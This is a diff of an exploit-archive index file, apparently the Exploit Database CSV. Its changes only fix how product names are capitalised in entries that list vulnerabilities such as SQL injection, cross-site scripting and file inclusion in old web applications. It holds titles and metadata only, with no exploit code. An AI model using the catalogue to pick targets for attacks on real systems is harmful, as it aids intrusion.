26343,platforms/php/webapps/26343.txt,"Accelerated E Solutions - SQL Injection",2005-10-11,"Andysheh Soltani",php,webapps,0 26344,platforms/cgi/webapps/26344.txt,"WebGUI 6.x - Arbitrary Command Execution",2005-10-12,"David Maciejak",cgi,webapps,0 -26345,platforms/php/webapps/26345.txt,"YaPig 0.95 b - view.php img_size Parameter Cross-Site Scripting",2005-10-13,enji@infosys.tuwien.ac.at,php,webapps,0 +26345,platforms/php/webapps/26345.txt,"YaPiG 0.95 b - view.php img_size Parameter Cross-Site Scripting",2005-10-13,enji@infosys.tuwien.ac.at,php,webapps,0 26346,platforms/php/webapps/26346.txt,"Accelerated Mortgage Manager - Password Field SQL Injection",2005-10-13,imready4chillin,php,webapps,0 26347,platforms/php/webapps/26347.txt,"Gallery 2.0 - Main.php Directory Traversal",2005-10-14,"Michael Dipper",php,webapps,0 26348,platforms/php/webapps/26348.txt,"Complete PHP Counter - SQL Injection",2005-10-14,BiPi_HaCk,php,webapps,0 @@ -23602,11 +23602,11 @@ id,file,description,date,author,platform,type,port 26478,platforms/php/webapps/26478.txt,"Invision Power Services Invision Board 2.1 - admin.php Multiple Parameter Cross-Site Scripting",2005-11-07,benjilenoob,php,webapps,0 26479,platforms/windows/local/26479.txt,"Zone Labs Zone Alarm 6.0 - Advance Program Control Bypass",2005-11-07,Tr0y-x,windows,local,0 26480,platforms/php/webapps/26480.txt,"toendaCMS 0.6.1 - Admin.php Directory Traversal",2005-11-07,"Bernhard Mueller",php,webapps,0 -26481,platforms/php/webapps/26481.txt,"PHPList Mailing List Manager 2.x - /admin/admin.php id Parameter SQL Injection",2005-11-07,"Tobias Klein",php,webapps,0 -26482,platforms/php/webapps/26482.txt,"PHPList Mailing List Manager 2.x - /admin/editattributes.php id Parameter SQL Injection",2005-11-07,"Tobias Klein",php,webapps,0 -26483,platforms/php/webapps/26483.txt,"PHPList Mailing List Manager 2.x - /admin/eventlog.php Multiple Parameter Cross-Site Scripting",2005-11-07,"Tobias Klein",php,webapps,0 -26484,platforms/php/webapps/26484.txt,"PHPList Mailing List Manager 2.x - /admin/configure.php id Parameter Cross-Site Scripting",2005-11-07,"Tobias Klein",php,webapps,0 -26485,platforms/php/webapps/26485.txt,"PHPList Mailing List Manager 2.x - /admin/users.php find Parameter Cross-Site Scripting",2005-11-07,"Tobias Klein",php,webapps,0 +26481,platforms/php/webapps/26481.txt,"phpList Mailing List Manager 2.x - /admin/admin.php id Parameter SQL Injection",2005-11-07,"Tobias Klein",php,webapps,0 +26482,platforms/php/webapps/26482.txt,"phpList Mailing List Manager 2.x - /admin/editattributes.php id Parameter SQL Injection",2005-11-07,"Tobias Klein",php,webapps,0 +26483,platforms/php/webapps/26483.txt,"phpList Mailing List Manager 2.x - /admin/eventlog.php Multiple Parameter Cross-Site Scripting",2005-11-07,"Tobias Klein",php,webapps,0 +26484,platforms/php/webapps/26484.txt,"phpList Mailing List Manager 2.x - /admin/configure.php id Parameter Cross-Site Scripting",2005-11-07,"Tobias Klein",php,webapps,0 +26485,platforms/php/webapps/26485.txt,"phpList Mailing List Manager 2.x - /admin/users.php find Parameter Cross-Site Scripting",2005-11-07,"Tobias Klein",php,webapps,0 26486,platforms/php/webapps/26486.txt,"SAP Web Application Server 6.x/7.0 - Error Page Cross-Site Scripting",2005-11-09,"Leandro Meiners",php,webapps,0 26487,platforms/php/webapps/26487.txt,"SAP Web Application Server 6.x/7.0 - frameset.htm sap-syscmd Parameter Cross-Site Scripting",2005-11-09,"Leandro Meiners",php,webapps,0 26488,platforms/php/webapps/26488.txt,"SAP Web Application Server 6.x/7.0 - URI Redirection",2005-11-09,"Leandro Meiners",php,webapps,0 @@ -23921,7 +23921,7 @@ id,file,description,date,author,platform,type,port 26801,platforms/php/webapps/26801.txt,"Snipe Gallery 3.1.4 - search.php keyword Parameter Cross-Site Scripting",2005-12-13,r0t,php,webapps,0 26802,platforms/hardware/dos/26802.py,"Tri-PLC Nano-10 r81 - Denial of Service",2013-07-13,Sapling,hardware,dos,0 27438,platforms/php/webapps/27438.txt,"Invision Power Services Invision Board 2.0.4 - Calendar Action Multiple Parameter Cross-Site Scripting",2006-03-17,Mr.SNAKE,php,webapps,0 -26804,platforms/php/webapps/26804.txt,"WordPress Spicy Blogroll Plugin - File Inclusion",2013-07-13,Ahlspiess,php,webapps,0 +26804,platforms/php/webapps/26804.txt,"Wordpress Spicy Blogroll Plugin - File Inclusion",2013-07-13,Ahlspiess,php,webapps,0 26805,platforms/windows/local/26805.rb,"Corel PDF Fusion - Stack Buffer Overflow",2013-07-13,Metasploit,windows,local,0 26806,platforms/asp/webapps/26806.txt,"BMC Service Desk Express 10.2.1.95 - Multiple Vulnerabilities",2013-07-13,"Nuri Fattah",asp,webapps,0 26807,platforms/windows/webapps/26807.txt,"McAfee ePO 4.6.6 - Multiple Vulnerabilities",2013-07-13,"Nuri Fattah",windows,webapps,0 @@ -23983,7 +23983,7 @@ id,file,description,date,author,platform,type,port 26867,platforms/php/webapps/26867.txt,"PHP Fusebox 3.0 - 'index.php' Cross-Site Scripting",2005-12-19,"bogel and lukman",php,webapps,0 26868,platforms/php/webapps/26868.txt,"JPortal 2.2.1/2.3 Forum - Forum.php SQL Injection",2005-12-19,Zbigniew,php,webapps,0 26869,platforms/windows/dos/26869.txt,"Microsoft Excel 95/97/2000/2002/2003/2004 - Unspecified Memory Corruption Vulnerabilities",2005-12-19,ad@heapoverflow.com,windows,dos,0 -26870,platforms/php/webapps/26870.txt,"Advanced Guestbook 2.x - Multiple Cross-Site Scripting Vulnerabilities",2005-12-19,Handrix,php,webapps,0 +26870,platforms/php/webapps/26870.txt,"Advanced GuestBook 2.x - Multiple Cross-Site Scripting Vulnerabilities",2005-12-19,Handrix,php,webapps,0 26871,platforms/php/webapps/26871.txt,"PlaySms - 'index.php' Cross-Site Scripting",2005-12-19,mohajali2k4,php,webapps,0 26872,platforms/php/webapps/26872.txt,"PHP-Fusion 6.0 - Members.php Cross-Site Scripting",2005-12-19,krasza,php,webapps,0 26873,platforms/asp/webapps/26873.txt,"Acidcat CMS 2.1.13 - default.asp ID Parameter SQL Injection",2005-12-19,admin@hamid.ir,asp,webapps,0 @@ -24017,7 +24017,7 @@ id,file,description,date,author,platform,type,port 26901,platforms/php/webapps/26901.txt,"Miraserver 1.0 RC4 - newsitem.php id Parameter SQL Injection",2005-12-19,r0t,php,webapps,0 26902,platforms/php/webapps/26902.txt,"Miraserver 1.0 RC4 - article.php cat Parameter SQL Injection",2005-12-19,r0t,php,webapps,0 26903,platforms/asp/webapps/26903.txt,"Baseline CMS 1.95 - Multiple Input Validation Vulnerabilities",2005-12-19,r0t,asp,webapps,0 -26904,platforms/php/webapps/26904.txt,"Bitweaver 1.1.1 beta - list_galleries.php sort_mode Parameter Cross-Site Scripting",2005-12-19,r0t,php,webapps,0 +26904,platforms/php/webapps/26904.txt,"Bitweaver 1.1.1 Beta - list_galleries.php sort_mode Parameter Cross-Site Scripting",2005-12-19,r0t,php,webapps,0 26905,platforms/php/webapps/26905.txt,"Bitweaver 1.1.1 - view_post.php post_id Parameter Cross-Site Scripting",2005-12-19,r0t,php,webapps,0 26906,platforms/php/webapps/26906.txt,"Bitweaver 1.1.1 - view.php blog_id Parameter Cross-Site Scripting",2005-12-19,r0t,php,webapps,0 26907,platforms/php/webapps/26907.txt,"Bitweaver 1.1.1 - message_box.php sort_mode Parameter Cross-Site Scripting",2005-12-19,r0t,php,webapps,0 @@ -24084,7 +24084,7 @@ id,file,description,date,author,platform,type,port 26968,platforms/php/webapps/26968.txt,"SyntaxCMS - Search Query Cross-Site Scripting",2005-12-21,r0t3d3Vil,php,webapps,0 26969,platforms/asp/webapps/26969.txt,"Tangora Portal CMS 4.0 - Action Parameter Cross-Site Scripting",2005-12-22,r0t3d3Vil,asp,webapps,0 26970,platforms/windows/local/26970.c,"McAfee VirusScan 8.0 - Path Specification Privilege Escalation",2005-12-22,"Reed Arvin",windows,local,0 -26971,platforms/osx/dos/26971.txt,"Apple Mac OS X - KHTMLParser Remote Denial of Service",2005-12-22,"Tom Ferris",osx,dos,0 +26971,platforms/osx/dos/26971.txt,"Apple Mac OSX - KHTMLParser Remote Denial of Service",2005-12-22,"Tom Ferris",osx,dos,0 26972,platforms/jsp/webapps/26972.txt,"oracle application server discussion forum portlet - Multiple Vulnerabilities",2005-12-23,"Johannes Greil",jsp,webapps,0 26973,platforms/php/webapps/26973.txt,"Cerberus Helpdesk 2.649 - cer_KnowledgebaseHandler.class.php _load_article_details Function SQL Injection",2005-12-27,"A. Ramos",php,webapps,0 26974,platforms/php/webapps/26974.txt,"Cerberus Helpdesk 2.649 - addresses_export.php queues Parameter SQL Injection",2005-12-27,"A. Ramos",php,webapps,0 @@ -24106,7 +24106,7 @@ id,file,description,date,author,platform,type,port 26990,platforms/php/webapps/26990.txt,"MyBB 1.0 - Globa.php Cookie Data SQL Injection",2005-12-29,imei,php,webapps,0 26991,platforms/asp/webapps/26991.html,"Web Wiz Multiple Products - SQL Injection",2005-12-30,DevilBox,asp,webapps,0 26992,platforms/php/webapps/26992.txt,"Ades Design AdesGuestbook 2.0 Read Script - Cross-Site Scripting",2005-12-30,r0t3d3Vil,php,webapps,0 -26993,platforms/php/webapps/26993.txt,"OOApp Guestbook 2.1 Home Script - Cross-Site Scripting",2005-12-30,r0t3d3Vil,php,webapps,0 +26993,platforms/php/webapps/26993.txt,"OOApp GuestBook 2.1 Home Script - Cross-Site Scripting",2005-12-30,r0t3d3Vil,php,webapps,0 26994,platforms/php/webapps/26994.txt,"Kayako SupportSuite 3.0 0.26 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-30,r0t3d3Vil,php,webapps,0 26995,platforms/php/webapps/26995.txt,"PHPDocumentor 1.2/1.3 - Forum Lib Variable Cross-Site Scripting",2005-12-30,"zeus olimpusklan",php,webapps,0 26996,platforms/aix/local/26996.txt,"IBM AIX 5.3 - GetShell and GetCommand File Enumeration",2005-12-30,xfocus,aix,local,0 @@ -24131,11 +24131,11 @@ id,file,description,date,author,platform,type,port 27011,platforms/jsp/webapps/27011.txt,"Sybase EAServer 6.3.1 - Multiple Vulnerabilities",2013-07-22,"SEC Consult",jsp,webapps,0 27012,platforms/windows/remote/27012.rb,"Apple Quicktime 7 - Invalid Atom Length Buffer Overflow",2013-07-22,Metasploit,windows,remote,0 27013,platforms/windows/remote/27013.rb,"HP Managed Printing Administration - jobAcct Remote Command Execution",2013-07-22,Metasploit,windows,remote,0 -27015,platforms/php/webapps/27015.txt,"Chipmunk Guestbook 1.4 - Homepage HTML Injection",2005-12-29,"Aliaksandr Hartsuyeu",php,webapps,0 +27015,platforms/php/webapps/27015.txt,"Chipmunk GuestBook 1.4 - Homepage HTML Injection",2005-12-29,"Aliaksandr Hartsuyeu",php,webapps,0 27016,platforms/php/webapps/27016.txt,"Chimera Web Portal 0.2 - modules.php Multiple Parameter Cross-Site Scripting",2006-01-01,"Aliaksandr Hartsuyeu",php,webapps,0 27017,platforms/php/webapps/27017.txt,"Chimera Web Portal 0.2 - linkcategory.php id Parameter SQL Injection",2006-01-01,"Aliaksandr Hartsuyeu",php,webapps,0 27018,platforms/php/webapps/27018.txt,"ScozNet ScozBook 1.1 - AdminName Variable SQL Injection",2006-01-02,"Aliaksandr Hartsuyeu",php,webapps,0 -27019,platforms/php/webapps/27019.txt,"VBulletin 3.5.2 - Event Title HTML Injection",2006-02-01,trueend5,php,webapps,0 +27019,platforms/php/webapps/27019.txt,"vBulletin 3.5.2 - Event Title HTML Injection",2006-02-01,trueend5,php,webapps,0 27020,platforms/php/webapps/27020.txt,"Drupal 4.x - URL-Encoded Input HTML Injection",2006-01-01,liz0,php,webapps,0 27021,platforms/cgi/webapps/27021.txt,"DiscusWare Discus 3.10 - Error Message Cross-Site Scripting",2006-01-02,$um$id,cgi,webapps,0 27022,platforms/php/webapps/27022.txt,"INCOGEN Bugport 1.x - Multiple SQL Injections",2006-01-03,r0t,php,webapps,0 @@ -24335,17 +24335,17 @@ id,file,description,date,author,platform,type,port 27214,platforms/php/webapps/27214.txt,"DeltaScripts PHP Classifieds 6.20 - Member_Login.php SQL Injection",2006-02-14,"Audun Larsen",php,webapps,0 27215,platforms/php/webapps/27215.txt,"sNews - Comment Body Cross-Site Scripting",2006-02-14,joffer,php,webapps,0 27216,platforms/php/webapps/27216.txt,"sNews - 'index.php' Multiple Parameter SQL Injection",2006-02-14,joffer,php,webapps,0 -27217,platforms/php/webapps/27217.txt,"Dotproject 2.0 - /modules/projects/gantt.php dPconfig[root_dir] Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 -27218,platforms/php/webapps/27218.txt,"Dotproject 2.0 - /includes/db_connect.php baseDir Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 -27219,platforms/php/webapps/27219.txt,"Dotproject 2.0 - /includes/session.php baseDir Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 -27220,platforms/php/webapps/27220.txt,"Dotproject 2.0 - /modules/projects/gantt2.php dPconfig[root_dir] Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 -27221,platforms/php/webapps/27221.txt,"Dotproject 2.0 - /modules/projects/vw_files.php dPconfig[root_dir] Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 -27222,platforms/php/webapps/27222.txt,"Dotproject 2.0 - /modules/admin/vw_usr_roles.php baseDir Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 -27223,platforms/php/webapps/27223.txt,"Dotproject 2.0 - /modules/public/calendar.php baseDir Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 -27224,platforms/php/webapps/27224.txt,"Dotproject 2.0 - /modules/public/date_format.php baseDir Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 -27225,platforms/php/webapps/27225.txt,"Dotproject 2.0 - /modules/tasks/gantt.php baseDir Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 +27217,platforms/php/webapps/27217.txt,"dotProject 2.0 - /modules/projects/gantt.php dPconfig[root_dir] Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 +27218,platforms/php/webapps/27218.txt,"dotProject 2.0 - /includes/db_connect.php baseDir Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 +27219,platforms/php/webapps/27219.txt,"dotProject 2.0 - /includes/session.php baseDir Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 +27220,platforms/php/webapps/27220.txt,"dotProject 2.0 - /modules/projects/gantt2.php dPconfig[root_dir] Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 +27221,platforms/php/webapps/27221.txt,"dotProject 2.0 - /modules/projects/vw_files.php dPconfig[root_dir] Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 +27222,platforms/php/webapps/27222.txt,"dotProject 2.0 - /modules/admin/vw_usr_roles.php baseDir Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 +27223,platforms/php/webapps/27223.txt,"dotProject 2.0 - /modules/public/calendar.php baseDir Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 +27224,platforms/php/webapps/27224.txt,"dotProject 2.0 - /modules/public/date_format.php baseDir Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 +27225,platforms/php/webapps/27225.txt,"dotProject 2.0 - /modules/tasks/gantt.php baseDir Parameter Remote File Inclusion",2006-02-14,r.verton,php,webapps,0 27226,platforms/php/webapps/27226.txt,"RunCMS 1.2/1.3 - PMLite.php SQL Injection",2006-02-14,"Hamid Ebadi",php,webapps,0 -27227,platforms/php/webapps/27227.txt,"WordPress 2.0 - Comment Post HTML Injection",2006-02-15,imei,php,webapps,0 +27227,platforms/php/webapps/27227.txt,"Wordpress 2.0 - Comment Post HTML Injection",2006-02-15,imei,php,webapps,0 27228,platforms/php/webapps/27228.txt,"Mantis 0.x/1.0 - view_all_set.php Multiple Parameter Cross-Site Scripting",2006-02-15,"Thomas Waldegger",php,webapps,0 27229,platforms/php/webapps/27229.txt,"Mantis 0.x/1.0 - manage_user_page.php sort Parameter Cross-Site Scripting",2006-02-15,"Thomas Waldegger",php,webapps,0 27230,platforms/php/webapps/27230.txt,"My Blog 1.63 - BBCode HTML Injection",2006-02-15,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -24409,7 +24409,7 @@ id,file,description,date,author,platform,type,port 27287,platforms/php/webapps/27287.txt,"Cotonti 0.9.13 - SQL Injection",2013-08-02,"High-Tech Bridge SA",php,webapps,0 27288,platforms/hardware/webapps/27288.txt,"Western Digital My Net Wireless Routers - Password Disclosure",2013-08-02,"Kyle Lovett",hardware,webapps,0 27289,platforms/hardware/webapps/27289.txt,"TP-Link TL-SC3171 IP Cameras - Multiple Vulnerabilities",2013-08-02,"Core Security",hardware,webapps,0 -27290,platforms/php/webapps/27290.txt,"WordPress Plugin Better WP Security - Persistent Cross-Site Scripting",2013-08-02,"Richard Warren",php,webapps,0 +27290,platforms/php/webapps/27290.txt,"Wordpress Plugin Better WP Security - Persistent Cross-Site Scripting",2013-08-02,"Richard Warren",php,webapps,0 27291,platforms/windows/webapps/27291.txt,"Oracle Hyperion 11 - Directory Traversal",2013-08-02,"Richard Warren",windows,webapps,19000 27292,platforms/windows/dos/27292.py,"EchoVNC Viewer - Remote Denial of Service",2013-08-02,Z3r0n3,windows,dos,0 27293,platforms/php/remote/27293.rb,"PineApp Mail-SeCure - test_li_connection.php Arbitrary Command Execution",2013-08-02,Metasploit,php,remote,7443 @@ -24462,7 +24462,7 @@ id,file,description,date,author,platform,type,port 27340,platforms/php/webapps/27340.txt,"SMBlog 1.2 - Arbitrary PHP Command Execution",2006-03-01,botan,php,webapps,0 27341,platforms/php/webapps/27341.txt,"DCI-Designs Dawaween 1.03 - Poems.php SQL Injection",2006-03-02,sherba,php,webapps,0 27342,platforms/php/webapps/27342.txt,"PluggedOut Nexus 0.1 - forgotten_password.php SQL Injection",2006-03-02,"Hamid Ebadi",php,webapps,0 -27343,platforms/php/webapps/27343.txt,"VBulletin 3.0/3.5 - Profile.php Email Field HTML Injection",2006-03-02,imei,php,webapps,0 +27343,platforms/php/webapps/27343.txt,"vBulletin 3.0/3.5 - Profile.php Email Field HTML Injection",2006-03-02,imei,php,webapps,0 27344,platforms/php/webapps/27344.txt,"NZ Ecommerce System - 'index.php' Multiple Parameter SQL Injection",2006-03-02,r0t,php,webapps,0 27345,platforms/php/webapps/27345.txt,"LogIT 1.3/1.4 - Remote File Inclusion",2006-03-02,botan,php,webapps,0 27346,platforms/php/webapps/27346.txt,"VBZoom Forum 1.11 - Show.php MainID SQL Injection",2006-03-04,Mr.SNAKE,php,webapps,0 @@ -24512,11 +24512,11 @@ id,file,description,date,author,platform,type,port 27396,platforms/php/webapps/27396.txt,"txtForum 1.0.3/1.0.4 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-09,"Nenad Jovanovic",php,webapps,0 27397,platforms/linux/remote/27397.txt,"Apache suEXEC - Privilege Elevation / Information Disclosure",2013-08-07,kingcope,linux,remote,0 27398,platforms/php/webapps/27398.txt,"Pluck CMS 4.7 - HTML Code Injection",2013-08-07,"Yashar shahinzadeh",php,webapps,0 -27399,platforms/php/webapps/27399.txt,"WordPress Booking Calendar 4.1.4 Plugin - Cross-Site Request Forgery",2013-08-07,"Dylan Irzi",php,webapps,0 +27399,platforms/php/webapps/27399.txt,"Wordpress Booking Calendar 4.1.4 Plugin - Cross-Site Request Forgery",2013-08-07,"Dylan Irzi",php,webapps,0 27400,platforms/windows/remote/27400.py,"HP Data Protector - Arbitrary Remote Command Execution",2013-08-07,"Alessandro Di Pinto and Claudio Moletta",windows,remote,0 27401,platforms/windows/remote/27401.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Authentication Bypass / Directory Traversal SAM Retrieval Exploit",2013-08-07,Wireghoul,windows,remote,0 27402,platforms/hardware/webapps/27402.txt,"Hikvision IP Cameras 4.1.0 b130111 - Multiple Vulnerabilities",2013-08-07,"Core Security",hardware,webapps,0 -27403,platforms/php/webapps/27403.txt,"WordPress Usernoise Plugin 3.7.8 - Persistent Cross-Site Scripting",2013-08-07,RogueCoder,php,webapps,0 +27403,platforms/php/webapps/27403.txt,"Wordpress Usernoise Plugin 3.7.8 - Persistent Cross-Site Scripting",2013-08-07,RogueCoder,php,webapps,0 27405,platforms/php/webapps/27405.txt,"Joomla Sectionex Component 2.5.96 - SQL Injection",2013-08-07,"Matias Fontanini",php,webapps,0 27406,platforms/windows/webapps/27406.txt,"McAfee Superscan 4.0 - Cross-Site Scripting",2013-08-07,"Trustwave's SpiderLabs",windows,webapps,0 27407,platforms/windows/dos/27407.pl,"UnrealIRCd 3.x - Remote Denial of Service",2006-03-09,"Brandon Milner",windows,dos,0 @@ -24588,8 +24588,8 @@ id,file,description,date,author,platform,type,port 27483,platforms/php/webapps/27483.txt,"Pixel Motion - admin/index.php Multiple Field SQL Injection",2006-03-27,DaBDouB-MoSiKaR,php,webapps,0 27484,platforms/php/webapps/27484.txt,"Pixel Motion - 'index.php' date Parameter SQL Injection",2006-03-27,DaBDouB-MoSiKaR,php,webapps,0 27485,platforms/php/webapps/27485.txt,"DSLogin 1.0 - 'index.php' Multiple SQL Injection",2006-03-27,"Aliaksandr Hartsuyeu",php,webapps,0 -27486,platforms/asp/webapps/27486.txt,"Web Host Automation Ltd. Helm 3.2.10 beta - domains.asp txtDomainName Parameter Cross-Site Scripting",2006-03-27,r0t,asp,webapps,0 -27487,platforms/asp/webapps/27487.txt,"Web Host Automation Ltd. Helm 3.2.10 beta - default.asp Multiple Parameter Cross-Site Scripting",2006-03-27,r0t,asp,webapps,0 +27486,platforms/asp/webapps/27486.txt,"Web Host Automation Ltd. Helm 3.2.10 Beta - domains.asp txtDomainName Parameter Cross-Site Scripting",2006-03-27,r0t,asp,webapps,0 +27487,platforms/asp/webapps/27487.txt,"Web Host Automation Ltd. Helm 3.2.10 Beta - default.asp Multiple Parameter Cross-Site Scripting",2006-03-27,r0t,asp,webapps,0 27488,platforms/cgi/webapps/27488.txt,"BlankOL 1.0 - Bol.cgi Multiple Cross-Site Scripting Vulnerabilities",2006-03-27,r0t,cgi,webapps,0 27489,platforms/cfm/webapps/27489.txt,"FusionZONE CouponZONE 4.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-28,r0t,cfm,webapps,0 27490,platforms/cfm/webapps/27490.txt,"ClassifiedZONE 1.2 - Accountlogon.cfm Cross-Site Scripting",2006-03-28,r0t,cfm,webapps,0 @@ -24628,7 +24628,7 @@ id,file,description,date,author,platform,type,port 27527,platforms/multiple/remote/27527.rb,"Ruby on Rails - Known Secret Session Cookie Remote Code Execution",2013-08-12,Metasploit,multiple,remote,0 27529,platforms/php/remote/27529.rb,"OpenX - Backdoor PHP Code Execution",2013-08-12,Metasploit,php,remote,0 27530,platforms/multiple/remote/27530.rb,"Squash - YAML Code Execution",2013-08-12,Metasploit,multiple,remote,0 -27531,platforms/php/webapps/27531.txt,"WordPress Hms Testimonials Plugin 2.0.10 - Multiple Vulnerabilities",2013-08-12,RogueCoder,php,webapps,0 +27531,platforms/php/webapps/27531.txt,"Wordpress Hms Testimonials Plugin 2.0.10 - Multiple Vulnerabilities",2013-08-12,RogueCoder,php,webapps,0 27532,platforms/php/webapps/27532.txt,"Joomla redSHOP Component 1.2 - SQL Injection",2013-08-12,"Matias Fontanini",php,webapps,0 27534,platforms/php/webapps/27534.txt,"MediaSlash Gallery - 'index.php' Remote File Inclusion",2006-03-30,"Morocco Security Team",php,webapps,0 27535,platforms/php/webapps/27535.txt,"O2PHP Oxygen 1.0/1.1 - Post.php SQL Injection",2006-03-30,"Morocco Security Team",php,webapps,0 @@ -24687,7 +24687,7 @@ id,file,description,date,author,platform,type,port 27591,platforms/php/webapps/27591.txt,"Shadowed Portal 5.7 - Load.php Cross-Site Scripting",2006-04-10,Liz0ziM,php,webapps,0 27592,platforms/php/webapps/27592.txt,"SIRE 2.0 - Arbitrary File Upload",2006-04-10,simo64,php,webapps,0 27593,platforms/php/webapps/27593.txt,"VegaDNS 0.9.9 - 'index.php' cid Parameter SQL Injection",2006-04-10,Ph03n1X,php,webapps,0 -27594,platforms/cgi/webapps/27594.txt,"Matt Wright Guestbook 2.3.1 - Guestbook.pl Multiple HTML Injection Vulnerabilities",2006-04-07,Liz0ziM,cgi,webapps,0 +27594,platforms/cgi/webapps/27594.txt,"Matt Wright GuestBook 2.3.1 - Guestbook.pl Multiple HTML Injection Vulnerabilities",2006-04-07,Liz0ziM,cgi,webapps,0 27595,platforms/php/remote/27595.txt,"PHP 4.x - tempnam() Function open_basedir Restriction Bypass",2006-04-10,"Maksymilian Arciemowicz",php,remote,0 27596,platforms/php/remote/27596.txt,"PHP 4.x - copy() Function Safe Mode Bypass",2006-04-10,"Maksymilian Arciemowicz",php,remote,0 27597,platforms/php/webapps/27597.txt,"KCFinder 2.51 - Local File Disclosure",2013-08-15,DaOne,php,webapps,0 @@ -24721,7 +24721,7 @@ id,file,description,date,author,platform,type,port 27626,platforms/php/webapps/27626.txt,"Tritanium Bulletin Board 1.2.3 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-11,d4igoro,php,webapps,0 27627,platforms/windows/remote/27627.txt,"Saxopress - URL Parameter Directory Traversal",2006-04-11,SecuriTeam,windows,remote,0 27628,platforms/php/webapps/27628.txt,"SWSoft Confixx 3.0.6/3.0.8/3.1.2 - 'index.php' SQL Injection",2006-04-11,LoK-Crew,php,webapps,0 -27629,platforms/php/webapps/27629.txt,"Chipmunk Guestbook 1.3 - 'index.php' SQL Injection",2006-04-12,Dr.Jr7,php,webapps,0 +27629,platforms/php/webapps/27629.txt,"Chipmunk GuestBook 1.3 - 'index.php' SQL Injection",2006-04-12,Dr.Jr7,php,webapps,0 27630,platforms/linux/remote/27630.txt,"Plone 2.x - MembershipTool Access Control Bypass",2006-04-12,MJ0011,linux,remote,0 27631,platforms/cgi/webapps/27631.txt,"Interaktiv.shop 4/5 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-12,r0t,cgi,webapps,0 27632,platforms/php/webapps/27632.txt,"phpMyAdmin 2.7 - SQL.php Cross-Site Scripting",2005-10-31,p0w3r,php,webapps,0 @@ -24754,7 +24754,7 @@ id,file,description,date,author,platform,type,port 27661,platforms/php/webapps/27661.txt,"TinyPHPForum 3.6 - Multiple Cross-Site Scripting Vulnerabilities (1)",2006-04-17,Hessam-x,php,webapps,0 27662,platforms/php/webapps/27662.txt,"Blursoft Blur6ex 0.3.462 - 'index.php' Local File Inclusion",2006-04-17,"Hamid Ebadi",php,webapps,0 27663,platforms/php/webapps/27663.txt,"DbbS 2.0 - Multiple Input Validation Vulnerabilities",2006-04-17,rgod,php,webapps,0 -27664,platforms/php/webapps/27664.txt,"Jax Guestbook 3.50 - Page Parameter Cross-Site Scripting",2006-04-17,ALMOKANN3,php,webapps,0 +27664,platforms/php/webapps/27664.txt,"Jax GuestBook 3.50 - Page Parameter Cross-Site Scripting",2006-04-17,ALMOKANN3,php,webapps,0 27665,platforms/php/webapps/27665.txt,"Calendarix 0.7 - YearCal.php Cross-Site Scripting",2006-04-17,botan,php,webapps,0 27666,platforms/php/webapps/27666.txt,"Manila 9.0.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-17,"Aaron Kaplan",php,webapps,0 27667,platforms/php/webapps/27667.txt,"MyBB 1.1 - Global Variable Overwrite",2006-04-17,imei,php,webapps,0 @@ -24784,7 +24784,7 @@ id,file,description,date,author,platform,type,port 27691,platforms/cgi/webapps/27691.txt,"xFlow 5.46.11 - index.cgi Multiple Parameter Cross-Site Scripting",2006-04-19,r0t,cgi,webapps,0 27692,platforms/php/webapps/27692.txt,"Plexum PlexCart X5 - Multiple SQL Injections",2006-04-19,r0t,php,webapps,0 27693,platforms/php/webapps/27693.txt,"otalCalendar - about.php inc_dir Parameter Remote File Inclusion",2006-04-19,VietMafia,php,webapps,0 -27694,platforms/cgi/webapps/27694.txt,"AWStats 4.0/5.x/6.x - AWstats.pl Multiple Cross-Site Scripting Vulnerabilities",2006-04-19,r0t,cgi,webapps,0 +27694,platforms/cgi/webapps/27694.txt,"AWStats 4.0/5.x/6.x - AWStats.pl Multiple Cross-Site Scripting Vulnerabilities",2006-04-19,r0t,cgi,webapps,0 27695,platforms/cgi/webapps/27695.txt,"Net Clubs Pro 4.0 - sendim.cgi Multiple Parameter Cross-Site Scripting",2006-04-20,r0t,cgi,webapps,0 27696,platforms/cgi/webapps/27696.txt,"Net Clubs Pro 4.0 - imessage.cgi username Parameter Cross-Site Scripting",2006-04-20,r0t,cgi,webapps,0 27697,platforms/cgi/webapps/27697.txt,"Net Clubs Pro 4.0 - login.cgi password Parameter Cross-Site Scripting",2006-04-20,r0t,cgi,webapps,0 @@ -24796,11 +24796,11 @@ id,file,description,date,author,platform,type,port 28062,platforms/asp/webapps/28062.txt,"Cisco CallManager 3.x/4.x - Web Interface ccmuser/logon.asp Cross-Site Scripting",2006-06-19,"Jake Reynolds",asp,webapps,0 28700,platforms/php/webapps/28700.txt,"CubeCart 3.0.x - view_order.php order_id Parameter Cross-Site Scripting",2006-09-26,"HACKERS PAL",php,webapps,0 28053,platforms/hardware/webapps/28053.txt,"Zoom Telephonics ADSL Modem/Router - Multiple Vulnerabilities",2013-09-03,"Kyle Lovett",hardware,webapps,0 -28054,platforms/php/webapps/28054.txt,"WordPress IndiaNIC Testimonial Plugin - Multiple Vulnerabilities",2013-09-03,RogueCoder,php,webapps,0 +28054,platforms/php/webapps/28054.txt,"Wordpress IndiaNIC Testimonial Plugin - Multiple Vulnerabilities",2013-09-03,RogueCoder,php,webapps,0 27700,platforms/windows/dos/27700.py,"VLC Player 